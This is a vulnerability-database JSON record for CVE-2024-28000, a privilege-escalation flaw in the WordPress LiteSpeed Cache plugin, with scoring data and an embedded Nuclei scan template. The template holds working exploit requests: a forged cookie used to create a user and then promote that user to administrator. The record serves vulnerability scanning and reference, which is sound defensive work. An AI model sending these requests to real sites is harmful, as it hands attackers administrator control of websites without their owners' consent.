{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-28000/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-28000/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-28000/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-28000/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-28000/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-28000"},"sightings":{"href":"/api/v1/sightings/cve-2024-28000"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.68266,"kev":false,"percentile":0.99307},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-28000.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2024-28000\n\ninfo:\n  name: WordPress LiteSpeed Cache - Unauthenticated Privilege Escalation to Admin\n  author: melmathari\n  severity: critical\n  description: |\n    Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Privilege Escalation.This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1.\n  impact: |\n    Unauthenticated attackers can escalate privileges to administrator level, gaining full control of the WordPress site.\n  remediation: |\n    Update LiteSpeed Cache plugin to a patched version addressing CVE-2024-28000.\n  reference:\n    - https://patchstack.com/database/vulnerability/litespeed-cache/wordpress-litespeed-cache-plugin-6-3-0-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve\n    - https://www.exploit-db.com/exploits/52328\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-28000\n    - https://vulncheck.com/xdb/6f169f41e032\n    - https://blog.securelayer7.net/cve-2024-28000-litespeed-cache-plugin/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-28000\n    cwe-id: CWE-266,NVD-CWE-Other\n    epss-score: 0.68266\n    epss-percentile: 0.99307\n    cpe: cpe:2.3:a:litespeedtech:litespeed_cache:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: litespeedtech\n    product: litespeed_cache\n    framework: wordpress\n    publicwww-query: \"/wp-content/plugins/litespeed-cache/\"\n  tags: cve,cve2024,wordpress,wp,wp-plugin,litespeed-cache,priv-esc,intrusive,vkev,vuln\n\nflow: http(1) || (http(2) && http(3))\n\nvariables:\n  username: \"{{to_lower(rand_text_alpha(5))}}\"\n  password: \"{{rand_text_alphanumeric(12)}}!\"\n  email: \"{{rand_base(8)}}@{{rand_base(5)}}.com\"\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(body, 'LiteSpeed Cache')\n          - compare_versions(version, '<= 6.3.0.1')\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        name: version\n        regex:\n          - 'Stable tag: ([0-9.]+)'\n\n  - raw:\n      - |\n        POST /wp-json/wp/v2/users HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Cookie: litespeed_role=1; litespeed_hash={{litespeed_hash}}\n\n        {\n          \"username\": \"{{username}}\",\n          \"password\": \"{{password}}\",\n          \"email\": \"{{email}}\"\n        }\n# The litespeed_hash input was required to escalate privileges to users\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 201\n          - contains(content_type, \"application/json\")\n          - contains_all(body, \"first_name\",\"username\")\n        condition: and\n        internal: true\n\n    extractors:\n      - type: json\n        name: user_id\n        json:\n          - \".id\"\n        internal: true\n\n  - raw:\n      - |\n        PUT /wp-json/wp/v2/users/{{user_id}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Cookie: litespeed_role=1; litespeed_hash={{litespeed_hash}}\n\n        {\n          \"roles\": [\"administrator\"]\n        }\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(content_type, \"application/json\")\n          - contains_all(body, \"administrator\",\"registered_date\")\n        condition: and\n# digest: 490a0046304402205e4f4d5a5e7c698d49a9d2fd06b9e81f449b2ae23e13ecd5230eba5730719d0d022002530a6a1ab2a195adf6731db5094cac61d4b8f44c6f460e3d6ac14db8f4c79e:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-28000"}